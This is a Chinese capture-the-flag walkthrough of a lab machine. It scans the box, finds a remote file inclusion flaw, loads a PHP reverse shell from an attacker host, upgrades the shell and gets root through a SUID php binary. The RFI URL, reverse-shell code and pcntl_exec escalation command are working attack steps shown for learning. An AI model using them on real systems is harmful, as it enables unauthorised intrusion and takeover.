quick
quick
扫描一下:
阔以!
信息搜集
端口扫描
1
sudo nmap -Pn 10.0.2.8
1
2
3
PORT STATE SERVICE
80/tcp open http
MAC Address: 08:00:27:41:D3:56 (Oracle VirtualBox virtual NIC)
1
nmap -sV -sT -T4 -p- 10.0.2.8
1
2
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
看来真没东西了。
目录扫描
1
feroxbuster -u http://10.0.2.8
1
2
3
4
5
6
7
8
9
10
11
301 GET 9l 28w 305c http://10.0.2.8/images => http://10.0.2.8/images/
200 GET 88l 342w 3735c http://10.0.2.8/index.php
200 GET 314l 2467w 220000c http://10.0.2.8/images/logo.png
200 GET 2190l 12161w 863176c http://10.0.2.8/images/joe.jpeg
200 GET 2740l 14581w 1058919c http://10.0.2.8/images/jane.jpeg
200 GET 134l 799w 59813c http://10.0.2.8/images/pexels-adrian-newell-6968984.jpg
200 GET 255l 1417w 103988c http://10.0.2.8/images/pexels-mike-bird-190537.jpg
200 GET 261l 453w 4038c http://10.0.2.8/styles.css
200 GET 88l 342w 3735c http://10.0.2.8/
200 GET 1795l 10935w 818584c http://10.0.2.8/images/pexels-pixabay-38570.jpg
200 GET 157l 983w 66146c http://10.0.2.8/images/pexels-ishan-kulshrestha-9334971.jpg
以防万一FUZZ一下:
1
ffuf -u http://10.0.2.8/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
1
2
images [Status: 301, Size: 305, Words: 20, Lines: 10, Duration: 115ms]
server-status [Status: 403, Size: 273, Words: 20, Lines: 10, Duration: 0ms]
没啥东西了,开撤!
漏洞扫描
1
nikto -h http://10.0.2.8
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.0.2.8
+ Target Hostname: 10.0.2.8
+ Target Port: 80
+ Start Time: 2024-03-20 13:20:16 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /images: IP address found in the 'location' header. The IP is "127.0.1.1". See: https://portswigger.net/kb/issues/00600300_private-ip-addresses-disclosed
+ /images: The web server may reveal its internal or real IP in the Location header via a request to with HTTP/1.0. The value is "127.0.1.1". See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0649
+ Apache/2.4.41 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /images/: Directory indexing found.
+ /index.php: Output from the phpinfo() function was found.
+ /index.php?page=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ 8102 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2024-03-20 13:20:33 (GMT-4) (17 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
漏洞利用
RFI漏洞利用
扫出来了一个RFI漏洞:
http://10.0.2.8/index.php?page=http://10.0.2.4:8888/webshell
1
2
3
4
5
6
7
8
9
10
# head webshell.php
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
set_time_limit (0);
$VERSION = "1.0";
$ip = '10.0.2.8'; // You have changed this
$port = 1234; // And this
$chunk_size = 1400;
实际上,就算没有打全,只打前几个字母,也可以请求到正确的文件!
提权
扩展shell
1
python3 -c 'import pty;pty.spawn("/bin/bash")'
发现suid漏洞
这个php7.0明显有suid:https://gtfobins.github.io/gtfobins/php/
1
/usr/bin/php7.0 -r "pcntl_exec('/bin/sh', ['-p']);"
寻找flag
本文由作者按照 CC BY 4.0 进行授权